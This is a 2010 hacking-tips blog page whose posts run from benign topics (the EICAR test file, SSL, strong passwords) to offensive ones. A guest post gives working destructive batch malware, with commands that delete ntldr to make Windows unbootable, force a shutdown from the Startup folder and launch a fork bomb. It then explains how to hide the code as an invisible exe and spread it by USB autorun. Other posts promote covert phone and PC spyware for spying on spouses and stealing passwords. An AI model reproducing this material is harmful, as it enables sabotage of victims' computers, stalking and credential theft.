Write at HWS !!!

Guest Posting

How secure is your Computer ?

Check out your computer safety here . A lot of tools , tricks and hacks related to computer .

Blogger Tips and Tricks

A Lot of tips ,tricks and hacks related to blogger . Seo tricks to get maximum targetted traffic to your blog.

Easy ways to Earn Online

Online earning is not so difficult but it needs a lot of patience and hardwork. Here are some techniques to earn money through internet.

Facebook Tricks

A lot of facebook tips , tricks and hacks.It requires a lot of time but reading is must.

Pro Hacking

If you have knowledge about basic techniques then try this,but be careful as it is highly toxic.

Showing newest 26 of 41 posts from October 2010. Show older posts
Showing newest 26 of 41 posts from October 2010. Show older posts

Saturday, October 30, 2010

What others are saying about My Book?

                                  
A few weeks back I told you about my book on Ethical Hacking which was launched on 15th of august. I have had lots of sales and also have received the feedback from the readers and webmasters which have read it, so I though you to share the testimonials with you.
Below are Few of the Testimonials I have received so far:


    

    

I will be updating this page frequently as soon as I receive new Testimonials, If you are a Beginner and would like to know How Hackers Hack computer systems, Networks, Facebook ,Orkut or Gmail accounts etc so I suggest you reading my book "A Beginners Guide To Ethical Hacking"






Thursday, October 28, 2010

How to Spy a Cellphone - Mobile spy

Every day I get a lot of emails from people asking how to spy on cell phone or How to hack a cellphone. To spy on a given cell phone all you need to do is install a good cell phone spy software on the target cell phone and once you do this you can silently record every SMS and information about each call. You can also see GPS positions every thirty minutes.


Why Mobile Spy?


There exists many cell phone spy softwares on the market and hence people often get confused about which cell phone spy software to go for. To make this job simpler for you we personally tested some of the top cell phone spy software's and based on the results we conclude Mobile Spy as be the best one.


Here is an overview of the entire process:

Mobile Spy is a hybrid software/service which allows you to monitor your smartphone in real time. This unique system records the activities of anyone who uses your compatible iPhone, BlackBerry, Android, Windows Mobile or Symbian OS smartphone. You install a small application onto your phone. It starts at every boot of your phone but remains stealth and does not show up in the running process list.


After the software is setup on your phone it will record an array of phone activities and then silently upload the data to your private Mobile Spy account using the Internet. When you want to view results, simply login to the Online Control Panel from any computer and enter your username and password to proceed.


Mobile Spy Features:


This powerful system gives you the ability to spy a cellphone and to monitor activities online in real time. Your logs are safely stored in your https-SECURED Mobile Spy account which is accessible only by you from any web browser using a username and password you create.


You can login anytime from any location to view results without needing access to the phone. The activities recorded are each described below. All activities include a date/time stamp and are searchable by phone number. All logs can be easily exported to CSV for importing to your database!


Calls Log


Each incoming and outgoing number is logged along with duration and time stamp.


SMS (Text Messages) Log


Every text message is logged even if the phone's logs are deleted. Includes full text.


GPS Locations Log


The device's current location is frequently logged using GPRS when signal available.


Web Site URLs Log


Each address visited in browser is logged. This feature is currently for iPhones only.


Log Summary


A summary of all activities can be shown along with separate viewers for each type.
The working of  Mobile Spy is very simple and needs no extra knowledge to install and use.

Step 1- After you purchase Mobile Spy you’ll get a link to download the software. Along with this you’ll get a username and password for you online control panel.

Step 2- Install the downloaded cell phone spy software onto the target cell phone that you want to spy on. After the installation, spy software starts recording all the activities on the cell phone.

Step 3- Login to your online control panel to see the logs containing the recorded information.
Mobile Spy is fully compatible with the following cell phones
  1. BlackBerry Phones
  2. Android Phones
  3. Apple iPhones
  4. Windows Mobile Phones
  5. Symbian OS 9.x and 8.x phones


Click Here for the Complete List of Compatible Phones. For more info on this product visit the Mobile Spy homepage with the link below
Mobile Spy Homepage


So what are you waiting for? Go grab Mobile Spy now and start spying on any cell phone within hours. Visit the following link to order Mobile Spy Now!

Mobile spy - The Cellphone monitoring software                        

                         






Monday, October 25, 2010

A major flaw in Mcafee URL shortner

Image and video hosting by TinyPic
Mcafee claims its products to be top and most popular security product, Today I heard about Mcafee url shorting service, As I visited the Mcafee Url shortning website, I found that they claimed that their url shortner is safe and secure.

Image and video hosting by TinyPic

So I thought to test it, I created a Facebook fake login page and tried to shorten it with Mcafee url shortner, hoping that it was detect it and will not allow to shorten it, but I was shocked to see that Mcafee actually showed that the website is safe, see the image below:


As lots of people trust on mcafee and a hacker could take an advantage of Mcafee Url shortning service and steal thousands of email accounts, this shows that one should not always rely on softwares for security, 


Hope Mcafee fix this very soon 






Cyber Terrors Book by Vaidehi Sachin

Recently Miss vaidehi sachin told me that her book cyber terrors will be launcehd on 30 th october, The Book describes the Hacker Culture, hair rising facts and sensational hidden side of cyber world, Vaidehi describes the people, the machines, and the events that defined the Hacker Culture and the Hacker Ethic, from the early mainframe hackers at MIT, to the self-made hardware hackers and game hackers
 



To download PDF copy of this book CLICK HERE


To grab your copy today. You can also mail us on cyberterrors@gmail.com






Saturday, October 23, 2010

Test Your Anti-virus Program

You have an anti-virus program. How can you test that it works?

This is a good question and it is wise to familiarize yourself with how your anti-virus software behaves when it detects a virus, before it really happens. One quick way to do this is to use the EICAR Anti-Virus Test File. This is a test file that will cause no damage to your system and still allow you to test if anti-virus tool is awake.

Here are some steps:

1. Open a text editor (e.g. Notepad)

2. Enter the following text in it:

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

3. Save the file as EICAR.COM on your desktop.

4. Open DOS and try to execute this .COM file (or simply double-click the file on Desktop)

If your anti-virus software is working properly, it will warn you that a virus has been detected when you attempt to run the .COM file.

To be double-sure, zip this file, and then try double-clicking on the ZIP file to see if your AV tool recognized viruses inside ZIP files. You can also send this file to yourself as an attachment, just to verify if your AV tool has command of email cleanliness.



 






Best proxy ever!!!


Best proxy ever!!! Password protected!!!

1) Go to www.sefreak.com

2) The "Scholar Experience" crap is REAL, it really has an academic portal
3) Click on the hidden lock icon in the upper right
4) User: student
5) Pass: random1
6) Click explorer









Which spyware keylogger software to choose?

Photobucket
I continue the series of providing you with information of best spware keylogger softwares availible online.In this post i will tell you about all the best spyware products availible for various purposes.Today there exists many of spyware keylogger softwares because a lot of people want to monitor the activities of their children, spouse, friends etc.Most of people try to find thier crack version or serial key and end them self in infecting their PC  with Viruses.Most of people are confused with selection b/w Spyware keylogger software,so today the Title of my post is "Which spyware keylogger software to choose?"

What exactly is a Monitoring Software and how can it help me ?

A computer monitoring software is just like any other software (program) which when installed, secretly monitors each and every activity that takes place on the computer. The activities such as web browsing, chatting, gaming etc. are all recorded and saved. These monitoring softwares can record each and every keystroke. So it is possible to capture usernames and passwords very easily with minimum effort. Monitoring softwares are also commonly known as Keyloggers.

How can i install a spyware keylogger software?
 
Installing a spyware keylogger software is very simple,even a person with basic knowledge of computer can use and monitor each and every activity that takes place on the computer.You need to setup a secret password and hotkey combination which is required later to see the recorded data ( logs). After the installation is complete the software goes invisible,once the software gets installed it will sent you recorded data(logs) and screen shots of the activities that takes place on your computer.

Which spyware keylogger software to choose?


There exists different flavours of these softwares and you have to choose the one that best match your needs. Here is a list of some of the best monitoring programs that I recommend.


For monitoring your own PC:

If you want to monitor your own PC you can i recommend the following spyware software:

Spyagent:


Spytech SpyAgent is our award winning, powerful computer spy software that allows you to monitor EVERYTHING users do on your computer - in total stealth. SpyAgent provides a large array of essential computer monitoring features
Click here to goto official website of spyagent


Keystroke spy:

Keystroke Spy is a powerful tool that can log every keystroke users type and capture screenshots of their activities. Keystroke Spy can run in total stealth, email you when specific keywords are typed, and can even be set to only log keystrokes typed in specific applications. With Keystroke Spy you will be able to log websites users visit, emails they send, passwords they use, applications they interact with, typed documents, and see everything they did with visual screenshot playback!



For monitoring a Remote PC:

If you want to monitor a Remote PC then the following softwares are Recommended:

Sniperspy:
 
SniperSpy is the industry leading Remote password hacking software combined with the Remote Install and Remote Viewing feature.






Friday, October 22, 2010

How to catch a cheating spouse? - Catch a Cheater


Are you curious to know if your wife or your husband is cheating on you, Some studies reveal that:


  • Only 46% of men believe that online affairs are adultery. (DivorceMag)
  • Up to 37% of men and 22% of women admit to having affairs. Researchers think the vast majority of the millions of people who visit chat rooms, have multiple "special friends". (Dr. Bob Lanier, askbob.com)
  •  One-third of divorce litigation is caused by online affairs. (The Fortino Group)
  •  Approximately 70% of time on-line is spent in chatrooms or sending e-mail; of these interactions, the vast majority are romantic in nature. (Dr. Michael Adamse, PhD., co-author of "Affairs of the Net: The Cybershrinks' Guide to Online Relationships")

How to catch cheating spouse is an ebook which will guide you step by step to catch a cheating spouse, With How to catch a cheating spouse its a cake walk for you to catch a cheating spouse. Whether your partner has just started having an affair, been having an affair for a while, or just ended an affair, it doesn’t matter. I’ll show you how to get the solid evidence you need that will leave no room for excuses or alibis.

Bonuses

You will get the following Bonuses along with this book:




So what are you waiting for Grab your hands on Spouse catching Book and know if you your partner is cheating on your, For download links visit the link below:
Spouse Catching book






Thursday, October 21, 2010

How to create Batch file viruses?

What are Batch Files ?

According to wikipedia a batch file is a text file containing a series of commands intended to be executed by the command interprete, In this article I will be telling you the basics of batch files clear and developing the approach towards coding your own viruses. Lets begin with a simple example ,


Open your command prompt and change your current directory to 'desktop' by typing 'cd desktop' without quotes.
Now type these commands one by one

1. md x //makes directory 'x' on desktop
2. cd x // changes current directory to 'x'
3. md y // makes a directory 'y' in directory 'x'



We first make a folder/directory 'x', then enter in folder 'x',then make a folder 'y' in folder 'x' .
Now delete the folder 'x'.
Lets do the same thing in an other way. Copy these three commands in notepad and save file as anything.bat




Now just double click on this batch file and the same work would be done , You will get a folder 'x' on your desktop and folder 'y' in it. This means the three commands executed line by line when we run the batch file

So a batch file is simply a text containing series of commands which are executed automatically line by line when the batch file is run.

What can batch viruses do ?

They can be used to delete the windows files, format data, steal information,consume CPU resources to affect performance,disable firewalls,open ports,modify or destroy registry and for many more purposes.

Now lets start with simple codes,

Note: Type 'help' in command prompt to know about some basic commands and to know about using a particular command , type 'command_name /?' without quotes.


1.


:x
start cmd.exe
goto x // infinite loop

This code will be opening command prompt screen infinite times , irritating victim and affecting performance.


2.  copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” //these two commands will copy the batchfile in start up folders (in XP)
shutdown -s -t 00 //this will shutdown the computer in 0 seconds

Note : Files in Start up folder gets started automatically when windows starts .


Everytime the victim would start the computer, the batch file in start up would run and shutdown the computer immediately. You can remove this virus by booting the computer in Safe Mode and deleting the batch file from Start Up folder.

3. Goto C drive in Win XP , Tools->Folder Option->View
Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'. Click apply

Now you can see the operating system files. There is a one file 'ntldr' which is boot loader used to boot the windows.



Lets make a batch file to  delete this file from victim's computer and the windows will not start then.
attrib -S -R -H C:\ntldr // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively
del C:\ntldr //delete ntldr file

After ruuning this batch file , system will not reboot and a normal victim would definitely install the windows again. 




4.%0|%0 //Its percentage zero pipe percentage zero

This code creates a large number of processes very quickly in order to saturate the process table of windows. It will just hang the windows This is actually known as 'fork bomb'.



The viruses we just coded -: 




 


Note : Most of the batch viruses are simply undetectable by any anitiviruses
 
Tip : Coding good viruses just depends on the DOS commands you know and logic you use.

Limitations of Batch Viruses -:

1.Victim can easily read the commands by opening batch file in notepad.
2.The command prompt screen pops up,it alerts the victim and he can stop it.

To overcome these limitations,we need to convert these batch files into executable files that is exe files.


Download this Batch To Exe coverter from here.
http://www.mediafire.com/?uhsc5tfkd5dbn65

 
After running converter , open the batch file virus , Save as exe file , set visibility mode 'Invisible application' , than just click on compile button.



 


You can use other options as per your requirement.

Spreading batch viruses through pen drive -:


Step 1. 

 
Open notepad and write 



[autorun]
open=anything.bat
Icon=anything.ico

Save file as ‘autorun.inf


Step 2. Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .

When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.



About The Author

This is a guest post written by Aneesh M Makker. Aneesh M.Makker is an Ethical hacker from Malout, a town in Punjab.Click here to visit his Facebook Profile






Wednesday, October 20, 2010

Add Facebook in Outlook

Overview


The Microsoft Outlook Social Connector Provider for Facebook allows you to connect your Facebook account to the Outlook Social Connector and obtain information about your friends and colleagues. You can see status updates and recently posted items from your Facebook contacts.

You can also use Outlook Social Connector to display a quick view of related Outlook content when you click on an email from a contact, such as recent e-mail conversations, meetings, and shared attachments to help you easily track your communications

NOTE: The Microsoft Outlook Social Connector Provider requires Microsoft Outlook Social Connector and the related update (KB983403) to be installed. If these components are not already installed on your machine, the Microsoft Outlook Social Connector Provider for Facebook will download and install the necessary updates from the Microsoft Download Center before completing the provider installation.

System Requirements


  • Supported Operating Systems:Windows 7;Windows Server 2003, Datacenter x64 Edition;Windows Server 2003, Enterprise x64 Edition;Windows Server 2003, Standard x64 Edition;Windows Server 2008;Windows Vista 64-bit Editions Service Pack 1;Windows Vista Business 64-bit edition;Windows Vista Home Basic 64-bit edition;Windows XP 64-bit;Windows XP Professional 64-Bit Edition (Itanium) 2003;Windows XP Professional Edition;Windows XP Professional x64 Edition
  • Microsoft Windows XP SP3
  • Microsoft Windows Vista
  • Microsoft Windows 7


This download works with the following Office programs:
  • Microsoft Outlook 2010
  • Microsoft Office Outlook 2007
  • Microsoft Office Outlook 2003

Instructions


To install this download:

For Outlook 2010 32-bit, Outlook 2007, and Outlook 2003:
  1. Download the setup file by clicking the Download button next to OSCFB-x86-en-us.exe (below), and save the file to your hard disk.
  2. Double-click the OSCFB-x86-en-us.exe program file on your hard disk to start the Setup program.
  3. Follow the instructions on the screen to complete the installation.

For Outlook 2010 64-bit:
  1. Download the setup file by clicking the Download button next to OSCFB-x64-en-us.exe (below), and save the file to your hard disk.
  2. Double-click the OSCFB-x64-en-us.exe program file on your hard disk to start the Setup program.
  3. Follow the instructions on the screen to complete the installation.



Instructions for use:

  • After you install this download, restart Outlook, and you will be prompted by the Outlook Social Connector configuration wizard to connect to Facebook.
    1. Under Social Network Accounts, select Facebook.
    2. For User Name: enter your Facebook email account.
    3. For Password: enter your Facebook password.
    4. Click Connect
    5. Once the connection is successfully completed, click Finish
  • If you were not prompted by the Outlook Social Connector configuration wizard, you can still connect to Facebook.
    For Outlook 2010:
    1. On the View tab, in the People Pane group, click People Pane, and then click Account Settings.
    2. Under Social Network Accounts, select Facebook.
    3. For User Name: enter your Facebook email account.
    4. For Password: enter your Facebook password.
    5. Click Connect.
    6. Once the connection is successfully completed, click Finish.

    For Outlook 2007 and Outlook 2003:
    1. Click Tools, and then click Social Network Account Settings.
    2. Under Social Network Accounts, select Facebook.
    3. For User Name: enter your Facebook email account.
    4. For Password: enter your Facebook password.
    5. Click Connect.
    6. Once the connection is successfully completed, click Finish.

To remove this download:

For Outlook 2010 32-bit, Outlook 2007, and Outlook 2003:
  • To remove the download file, delete the file OSCFB-x86-en-us.exe.

For Outlook 2010 64-bit:
  • To remove the download file, delete the file OSCFB-x64-en-us.exe.


To uninstall the download:

To uninstall the Microsoft Outlook Social Connector Provider for Facebook:
  1. On the Start menu, point to Settings and then click Control Panel.
  2. Double-click Add/Remove Programs.
  3. In the list of currently installed programs, select Microsoft Outlook Social Connector Provider for Facebook and then click Remove or Add/Remove. If a dialog box appears, follow the instructions to remove the program.
  4. Click Yes or OK to confirm that you want to remove the program. 

CLICK HERE to download.








Tuesday, October 19, 2010

Make a Earthquake on Your Browser

The Earth Quake will take place for few seconds.
All you need is to copy the javascript code below and paste it into the address bar of your browser.. Hit enter..
It works only for mozilla and Internet Explorer browser..

The javascript code :
 
javascript:function flood(n) {if ( self.moveBy) {for (i = 35; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} flood(6);






Monday, October 18, 2010

What is Secure Sockets Layer (SSL)?

You might have heard some times that not to give your password or credit card information or any other sensitive information on public computers or on Msn, yahoo etc chats.The reason why you might have heard that the Hackers have some ways to you would have probably heard that hackers have a way to steal your your credit card numbers , passwords etc.
A hacker can use different types of attacks such as Packet sniffing or ARP Poisoning to steal your sensitive information

Secure Sockets Layer (SSL) is the most widely used technology for creating a secure communication between the web client and the web server. You must be familiar with http:// protocol and https:// protocol, You might be wondering what they mean. HTTP protocol is used for standard communication between the Web server and the client. HTTPS is used for a secure communication.

Cryptography


If two users want to have a secure communication they can also use cryptography to accomplish it

For example:

TFDVSF=Encrypted Text

SECURE= Decrypted Text

You might be wondering how i Decrypted it, Here i have used Algorithm=+ for the communication and the key is "1", What comes after S is T so as you can see that S is converted into T, What comes After E is F to letter E from the word secure if converted into F and so on, To help you understand this more better I am adding a Video



So If the hacker starts sniffing from between he will get Encrypted text and as the Hacker does not know the keys so he cant decrypt it, but if the attacker or hacker is sniffing from the starting point so he will get the key and can easily Decrypt the data

Standard Communication VS Secure communication

Suppose there exists two communication parties A (client) and B (server)

Standard communication(HTTP)


When A will send information to B it will be in unencrypted manner, this is acceptable if A is not sharing Confidential information, but if A is sending sensitive information say "Password" it will also be in unencrypted form, If a hacker starts sniffing the communication so he will get the password.This scenario is illustrated using the following figure




Secure communication(HTTPS)

In a secure communication i.e. HTTPS the conversation between A and B happens to be in a safe tunnel, The information which a user A sends to B will be in encrypted form so even if a hacker gets unauthorized access to the conversion he will receive the encrypted password (“xz54p6kd“) and not the original password.This scenario is illustrated using the following figure



How is HTTPS implemented?

A HTTPS protocol can be implemented by using Secure Sockets Layer (SSL), A website can implement HTTPS by purchasing SSL certificate.

Which websites need SSL Certificate?

The websites where a private conversation is occurred, Websites related to online transactions or other sensitive information needs to be protected needs to SSL Certificate

How to identify a Secure Connection?

In Internet Explorer and google chrome, you will see a lock icon Picture of the Lock icon in the Security Status bar. The Security Status bar is located on the right side of the Address bar. You can click the lock to view the identity of the website.

If you are making an online transaction through Credit card or any other means you should check if https:// secured communication is enabled.






Sunday, October 17, 2010

How to play Counter Strike 1.6 online for free

Counter strike is the #1 online action game in the world, and CS 1.6 its most popular version, I was mad at counter strike few years back , but for now it has been more than one year since I haven't played it for last 1 year as I have no time for it.

Counter strike 1.6 can be played online for free, the only requirement is that you should have a fast Internet connection or else you will not enjoy playing it will hang every few seconds, There are tons of methods to play Counter strike 1.6 online for free but I am writing a method which is very easy to implement and also very user friendly


How to play Counter Strike 1.6 online(Method)

1.First of all install counter strike 1.6 on your computer

2.Next you need to have list of cs1.6 free public servers on which you can play, One of the sites where you can find List of CS 1.6 Free public servers is:

http://www.gametracker.com/search/cs/


4..Start your cs 1.6 game


5.Go to find server,then goto favorite

6.Right click there and select add server by ip Address 

7.Now paste the server ip address which you have copied.

In the similar manner you can add more Servers to your game to play online, There are tons of free CS 1.6 servers available where you can play Counter Strike 1.6 Online for free

Also Read

Counter Strike 1.6 Aimbot - CS 1.6 Wallhack Cheats Download
CS 1.6 Aimbot hack - Counter strike cheats






Thursday, October 14, 2010

How To Create Strong Passwords?

As you know that passwords are the only form of security available now a days, Its really important for one to create a strong passwords,
Keeping a weak passwords can make you vulnerable to attacks such as Brute force, Dictionary attacks, Rainbow Tables etc.
So in this article I will tell you to create a strong password so you can secure your account from getting hacked

What makes a strong password?


A password can be considered strong if it contains following things:
  • It needs to contain special characters such as @#$%^&
  • It must be at least 8 characters long.
  • It must not have any common words such as 123, password, your birth date, your login name and any words that can be found in the dictionary,(This will prevent you from getting hacked by a Dictionary Attack)
  • a variation of capitalization and small letters
Alternatively there is a website named www.strongpasswordgenerator.com which automatically generates a strong password for you, The website allows you to choose a password length and also gives you hints through which you can easily memorize the password


Hope you liked the post ! Pass the comments






    Wednesday, October 13, 2010

    EBOMB : A deadly virus

    Ebomb is simple attack that enables multiple applications in victims pc just to harass him. If you have seen movie die hard4 then you must be familiar with this. Although there are many ways to ebomb but this is the most easiest way to do it. Simply open notepad and type
    @echo off
    start iexplore
    start notepad
    start firefox

    and save it as anything.bat (note: paste the code with "start " in numerous times to annoy them)
    you can also do some additional stuff like enter the message for victim eg. msg * "(Now your pc is getting f*$!*d)"
    and also you can open some porn websites to irritate victim eg.
    start iexplore "www.anypornwebsite.com"
    start firefox "www.oranyotherwebsite.com"
    (simply add them in the .bat file you created)
    Now just like always upload the file on any online storage (rapidshare, ziddu)
    and send the link to your victim (you can probably make him believe that its game or just any other app simply by converting the .bat in .exe by using iexplore (available in windows) or any other converter.
    When victim will open it .............. :D

    (Sample eg.
    @echo off
    msg * "(sorry buddy but you just f*$%d your self)"
    start iexplore "www.porn.com"
    start firefox "www.killwithme.com"
    start notepad
    start iexplore "www.porn.com"
    start firefox "www.killwithme.com"
    start notepad
    start iexplore "www.porn.com"
    start firefox "www.killwithme.com"
    start notepad
    start iexplore "www.porn.com"
    start firefox "www.killwithme.com"
    start notepad
    start iexplore "www.porn.com"
    start firefox "www.killwithme.com"
    start notepad
    start iexplore "www.porn.com"
    start firefox "www.killwithme.com"
    start notepad
    start iexplore "www.porn.com"
    start firefox "www.killwithme.com"
    start notepad
    start iexplore "www.porn.com"
    start firefox "www.killwithme.com"
    start notepad
    start iexplore "www.porn.com"
    start firefox "www.killwithme.com"
    start notepad
    start iexplore "www.porn.com"
    start firefox "www.killwithme.com"
    start notepad
    start iexplore "www.porn.com"
    start firefox "www.killwithme.com"
    start notepad
    start iexplore "www.porn.com"
    start firefox "www.killwithme.com"
    start notepad
    start iexplore "www.porn.com"
    start firefox "www.killwithme.com"
    start notepad
    start iexplore "www.porn.com"
    start firefox "www.killwithme.com"
    start notepad
    start iexplore "www.porn.com"
    start firefox "www.killwithme.com"
    start notepad
    start iexplore "www.porn.com"
    start firefox "www.killwithme.com"
    start notepad
    start iexplore "www.porn.com"
    start firefox "www.killwithme.com"
    start notepad
    start iexplore "www.porn.com"
    start firefox "www.killwithme.com"
    start notepad
    start iexplore "www.porn.com"
    start firefox "www.killwithme.com"
    start notepad
    start iexplore "www.porn.com"
    start firefox "www.killwithme.com"
    start notepad
    start iexplore "www.porn.com"
    start firefox "www.killwithme.com"
    start notepad
    start iexplore "www.porn.com"
    start firefox "www.killwithme.com"
    start notepad
    start iexplore "www.porn.com"
    start firefox "www.killwithme.com"
    start notepad
    start iexplore "www.porn.com"
    start firefox "www.killwithme.com"
    start notepad
    start iexplore "www.porn.com"
    start firefox "www.killwithme.com"
    start notepad
    and then simply save it as anything.bat

    Note : The only way to get out of any adware or ebomb attack is simply by logging out






    How to Protect an Email Account from being Hacked

    Today in this post I’ll teach you how to protect your email account from being hacked.
    Nowadays I get a lot of emails where most of the people say “My Email account is hacked please help…”. Now one question which arises in our mind is:”Is it so easy to hack an email account? OR Is it so difficult to protect an email account from being hacked?”. The single answer to these two questions is “Absolutely NOT!”. It is neither easy to hack an email nor difficult to protect an email account from bieng hacked.

    If this is the case, then what is the reason for many people to loose their accounts?
    The answer is very simple. They don’t know how to protect themselves from being hacked! In fact most of the people who loose their email accounts are not the victims of hacking but the victims of Trapping. They loose their passwords not because they are hacked by some expert hackers but they are fooled to such an extent that they themselves give away their password.

    Are you confused? If so continue reading and you’ll come to know…

    Now I’ll mention some of the most commonly used online scams which fool people and make them loose their passwords. I’ll also mention how to protect your email account from these scams.

    1. WEBSITE SPOOFING

    Website spoofing is the act of creating a website, with the intention of misleading the readers. The website will be created by a different person or organisation (Other than the original)especially for the purposes of cheating. Normally, the website will adopt the design of the target website and sometimes has a similar URL.

    For example a Spoofed Website of Yahoo.com appears exactly same as Yahoo Website. So most of the people believe that it is the original site and loose their passwords. The main intention of spoofed websites is to fool users and take away their passwords. For this,the spoofed sites offer fake login pages. These fake login pages resemble the original login pages of sites like Yahoo,Gmail,Orkut etc. Since it resemble’s the original login page people beleive that it is true and give away their username and passwords by trying to login to their accounts.

    Solution:

    * Never try to login/access your email account from the sites other than the original site.
    * Always type the URL of the site in the address bar to get into the site.Never click on the hyperlink to enter the site.

    2. BY USING KEYLOGGERS

    The other commonly used method to steal password is by using a Keylogger. A Keylogger is nothing but a spyware. The detailed description of keylogger and it’s usage is discussed in the post Hacking an email account. If you read this post you’ll come to know that it is too easy to steal the password using a keylogger program. If you just access your email account from a computer installed with keylogger, you definitely loose your password. This is because the keylogger records each and every keystroke that you type.

    Solution:

    Protecting yourselves from a keylogger scam is very easy.Just install a good anti-spyware program and update it regularly. This keeps your PC secure from a keylogger. Also there is a program called Anti-keylogger which is specially designed to detect and remove keyloggers. You can use this program to detect some stealth keyloggers which remain undetected by many anti-spyware programs.

    3. ACCESSING YOUR EMAIL ACCOUNT FROM CYBER CAFES
    Do you access your email from cyber cafes? Then definitely you are under the risk of loosing your password.In fact many people loose their email account in cyber cafes. For the owner of the cyber cafe it’s just a cakewalk to steal your password. For this he just need’s to install a keylogger on his computers. So when you login to your email account from this PC, you give away your password to the cafe owner. Also there are many Remote Administration Tools (RATs) which can be used to monitor your browsing activities in real time.

    This doesn’t mean that you should never use cyber cafes for browsing the internet. I know, not all the cyber cafe owners will be so wicked but it is recommended not to use cafes for accessing confidential information. If it comes to the matter of security never trust anyone, not even your friend. I always use my own PC to login to my accounts to ensure safety.






    Tuesday, October 12, 2010

    Facebook Chat Smileys

    Facebook is the most widely used Social Networking website in the world having the most advanced features, but instead of having so many features most people are not able to use it or they don’t know to use ,There are lots of smileys in Facebook chat but lots of people dont know about it, You can you smileys in Facebook chat and increase your Chatting experience,
    below I am placing a chart which will contain smileys in Facebook chat along with their code

     



    You can also use bold fonts or underlined fonts in facebook chat. To use bold fonts type your message between two asterisks.
    e.g. *message*
    To type underlined messages type your message between two underscores.
    e.g. _message_
    If you know some more Smileys in Facebook chat kindly share through commenting.

    Also Read:
    Facebook Chat Smiley Charts






    Mac Security Software - Secure Mac OS

    The area of Mac security software is fairly broad to Mac users. The primary aspects of security software for the Mac are antivirus programs, patches and updates for the Mac OS X, and updates from commonly used applications such as web browser Safari, Adobe Shockwave, and Google Chrome.

    In general, Mac users should be kept up-to-date on security fixes for all of the listed primary items above. Applying fixes will be automatic in the case of a program like Google Chrome while the Adobe Shockwave product will inform you of updates so long as you are connected to the Internet.
    Security vulnerabilities can reach in to Mac email applications as well to where you have what are known as botnets putting out spam email messages using your Mac. That is why you want an antivirus program that is robust and will provide you with security monitoring for emails as well as your hard disk and web site usage. Along with that, it is important to stay current on the latest Mac OS X fixes that apply to your operating system. Checking with Apple's website to ensure your current with security fixes is a good way to confirm the facts. There are also web blogs particular to Mac users that will indicate the latest Mac security software issues and fixes for widely-used products such as Safari.

    Antivirus programs are plentiful for the latest Mac OS X versions in use. It becomes harder to find support for antivirus software on older Mac OS X versions. Be aware of end-of-life software so that you are not caught short when it comes to security. The latest trojan horse viruses that are attacking Mac users are also a good thing to be aware of even if you have solid antivirus program software.

    Computer security is a big issue and is constantly playing catch up to those who exploit operating systems flaws, browser code weaknesses, and application program security flaws. Security flaws also exist in such ancillary programs the Mac uses such as Java. Java is used heavily for web-based communications and applications. Exploitations of Java can lead to corruption of your local system hard disk and data files.

    To avoid suffering the maladies of a compromised Mac computer system, always stay on top of the latest Mac security software fixes and visit trusted web sites while quickly aborting any unfamiliar web site to you that you were referred to or found wherein you see a lot of pop up advertising and free software checks of your Mac hard disk or statements about your Mac may be infected.

    For those Mac users that also run a Windows volume or partition, it is wise to have an equally running antivirus program on the Windows side. There are viruses that will go between both the Windows and Mac sides of your Mac computer. In fact, MS Office products that use visual basic along with macro commands are notorious for impacts from malware and trojans.

    The use of a robust antivirus program that will monitor both your Windows and Mac volumes, folders and files is that way to go.






    INSTALL XP IN ABOUT 20 MINS

    This tip will be very helpful for those who frequently install windows xp operating system. Normally OS installation takes around 40 minutes to complete, but through this trick you can now save 10-15 minutes. This simple tricks goes this way.

    1. Boot through Windows XP CD.

    2. After all the files are completely loaded, you get the option to select the partition. Select “c”.
    3. Now Format the partition, whether it is normal or quick with NTFS or FAT
    4. Once the formatting is completed, All the setup files required for installation are copied. Restart your system by pressing Enter.
    Now, here begins the Simple trick to save 10-15 minutes.
    5. After rebooting, you get a screen where it takes 40 minutes to complete or finalize the OS installation.
    6. Now, Press SHIFT + F10 Key -> This opens command prompt.
    7. Enter “Taskmgr” at the command prompt window. This will open Task Manager.
    8. Click the Process Tab, here we find a process called Setup.exe -> Right Click on Setup.exe -> Set Priority -> Select High or Above Normal. Initially it will be Normal.
    Thats it, no more work to do. Relax your self and see how fast the installation process completes






    How to reset BIOS password

    BIOS(Basic Input & Output) is a system of your computer's motherboard/CPU. It helps your computer to communicate with Operating System and other hardwares. So BIOS needs some temporary memory to store some information. There is a battery in mother board of your computer, called COMS Battery which helps BIOS to remember informations and clock time when your computer is off. All time we see a BIOS popup when we start our computer.


    We can protect our BIOS settings by locking it with password. You have seen often on different computers that before starting it asks for password thats called bios password . But what will happen if we forget our bios password?

    Yes, you have a fine solution if you forget your BIOS password. you have to remove your COMS battery from your mother board and wait for 15 minutes. Then again set it to you mother board. Now you BIOS password is gone.

    Remove COMS battery to reset BIOS password .

    Now start you computer. Now at the BIOS popup, there will be some message and out of them you will see a line like "Couldn't load BIOS information. Press F2 to enter into BIOS". Now enter into BIOS and press F9 to load default settings. Then press F10. And save settings. Now restart you computer.

    You can also used this trick to break the password of your friend if u have physical access to his pc .....






    Monday, October 11, 2010

    How to detect Anonymous IP Address?

    Proxies are easiest ways to hide your Identity, However Proxy's are mostly used by fraudsters, scammers and hackers to hide their Identity while committing cyber crimes and therefore in this article I will tell you how to detect those Anonymous IP address

    Following are some of the examples where fraudsters use the proxies to hide their actual IP.

     Credit Card Frauds

    Anonymous IP's are used for credit card frauds,such as cashing out the stolen credit card numbers and stealing the money, When ever a transaction is done from a credit card, the IP address of the computer from where the transaction is made is captured by the Credit card providers, So if the hacker or Fraudster is cashing out from his original location, he will be easily be traced.
    So to avoid it the Hacker or Fraudster would use a proxy in order to hide his original location and the spoofed IP will be captured by the Credit card providers

    Bypassing Restriction

    In most offices or schools websites like Facebook, orkut etc and other websites are blocked so people use proxy to bypass the restrictions and unlock the websites

    Accessing hacked accounts

    In Email service providers like gmail you can find the real IP Address from which you accessed the accounts previously, Say if a hacker has hacked some one's Gmail account and he is monitoring the hacked account, If he will login without a proxy, his real IP will be captured and therefore he will be traced

